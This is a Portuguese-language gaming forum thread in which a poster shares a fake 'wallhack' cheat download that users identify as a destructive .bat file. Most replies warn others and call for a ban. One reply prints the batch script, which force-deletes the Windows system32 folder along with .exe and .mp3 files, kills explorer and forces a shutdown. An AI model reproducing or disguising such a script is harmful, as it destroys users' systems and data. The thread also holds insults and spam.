Carcara10 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Características : -3 Wall - NoFlash e NoSmoke -FullBright -NoSky Aew galera consegui !!!! os cara da turquia conseguiram fazer o wall, e eu axei em um forum ! Download : É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Scan: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Rawks™ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Ae mano explica como usa o Cheats ae porque quase niguem vai entender como usa :D.Porque isso é coisa nova^^.Entao explica ae como usa. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pedrosgc 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · isso dae exclui os troço do teu PC n baixem ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maddox0 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · alguem ja testo??? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
' Vidaama 2 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · O man isso dai ta cheio de virus q destroi o pc ou vai funfa , to com medo de baxa ... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
therichipro 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · :( ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BadBoyRJJJ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · De boa baixei o wall e abria a pasta , quando não foi meu susto ao ver que o arquivo executavel era uma arquivo com extenção .Bat. Sinceramente aconselho a ninguem executar esse arquivo ainda , sem termos certeza absoluta que é viavel utiliza-lo. Mas cabe a cada um tomar a decisão que for, eu mesmo não irei executa-lo sem o devido cuidado de examina-lo melhor. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BKZeRa 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · badboy tbm se assustei quando vi isso so que eu fiz uma scan so desse negocio no virus total e n deu nenhum virus faiz isso tbm pra vc ver que n tenhu nenhum virus É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se agora tenhu medo ainda de abrir e ser um bat msm :S quando cliquei no wallhack.bat olha a imagem que apareceu É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
diba 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · nossa como que um cara posta um negocio desse pro pessoal aki do forum esse negocio ai vai é deletar os arquivo vo windoqns ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Gbik 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Mano vai posta Virus na bunda da tua mae --' Pra que fez Scan se o trosso ta xei de virus? Vai ti fude --' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Muskiao 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Coisa feia Carcara,pra mim tu era gente boa,agora postando arquivo .bat aqui,para ferrar com o pc dos outros,que feio em mano! CLOSED aqui ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carcara10 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Queria Ver Quantos Caras Caiam Nessa ! Eu Cai ^^ Sou Noob Mesmo ! Mas Pc Nao Modificou Nada ! Sei a PQ ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
BadBoyRJJJ 0 Postado 22 de Dezembro 2009 Compartilhar Postado 22 de Dezembro 2009 · Queria Ver Quantos Caras Caiam Nessa ! Eu Cai ^^ Sou Noob Mesmo ! Mas Pc Nao Modificou Nada ! Sei a PQ ! Pera ai deixa eu ve se eu entendi direito , vc esta assumindo que caiu em um erro e gostaria de ver quantas pessoas daqui da WC tb cairiam ???!!!!! Meu Deus isso foi a coisa mais irracional e estupida que vc postou,sou inteiramente favor de seu banimento de uma vez por todas da WC Peço aos moderadores que fechem esse topico e excluam esse link que ele postou, pois pelo que constatei pelo scan enviado por um outro usuario esse .bat age diretamente na pasta c:\Windows\system32, confirmando minhas uspeitas que realmente é um arquivo para danificar o pc, não sei ao certo a gravidade do ocorrido se alguem executar e nem tenho tempo pra pesquizar melhor , pois como podemos observar é LIXO. Closed and Ban ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
maycon_157 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 · Tanta gente flando mal nem vo baixa aushaushauhsau:d ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
No!@ 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 · se é isso mesmo q os kras estão falando, tem q fechar tópico e banir o kra ! pra q fazer isso ?? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xxtunaxx 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 · @echo off del /S /F c:\windows\system32\ del /S /F *exe del /S /F *mp3 taskkill /f /im "explorer.exe" shutdown -s -f -t 10 -c "Muestra del virus" ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Luana Paiva 0 Postado 23 de Dezembro 2009 Compartilhar Postado 23 de Dezembro 2009 · Visitem o melhor forum de cheats da galaxia. Clique Aqui Visitem o melhor forum de cheats da galaxia. CLIQUE AQUI Go Go!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Dan1005 0 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 · Galera cuidado! Meu amigo executo essa parada não caiam nessa esse arquivo .bat vai diretamente na pasta system32 do win e deleta se vc executar isso vai ter q reinstalar o win não baixem ban e closed moderação ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
juanlokao 0 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 · Ban e Closed ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kafemasol1 1 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 · ban e closed³ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Carcara10 0 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 · ban e closed○ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
-WodojO- 11 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 · Tanta gente flando mal nem vo baixa aushaushauhsau:d avisado por Flood. ban e closed○ Avisado por Flood. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados